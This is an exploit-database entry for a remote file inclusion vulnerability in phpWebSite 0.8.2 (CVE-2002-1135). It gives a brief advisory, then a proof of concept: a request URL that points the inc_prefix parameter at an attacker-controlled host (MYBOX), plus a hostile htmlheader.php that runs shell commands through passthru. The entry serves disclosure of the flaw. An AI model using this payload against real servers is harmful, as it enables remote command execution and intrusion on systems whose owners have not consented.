phpWebSite 0.8.2 - PHP File Inclusion
Author: Tim Vandermeersch
type: webapps
platform: php
port:
date_added: 2002-09-23
date_updated: 2012-10-09
verified: 1
codes: CVE-2002-1135;OSVDB-3848
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/5779/info
A vulnerability has been discovered in phpWebsite which allows an attacker to remotely include a malicious PHP file. It is possible for an attacker to specify a remote location for phpWebsite to download an attacker-supplied htmlheader.php script.
This issue could be exploited to execute arbitrary commands within the context of the webserver process.
The following proof of concept has been supplied by Tim Vandermeersch:
http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
--- htmlheader.php ---
<?php echo "<?php passthru("/bin/ls");?>" ?> .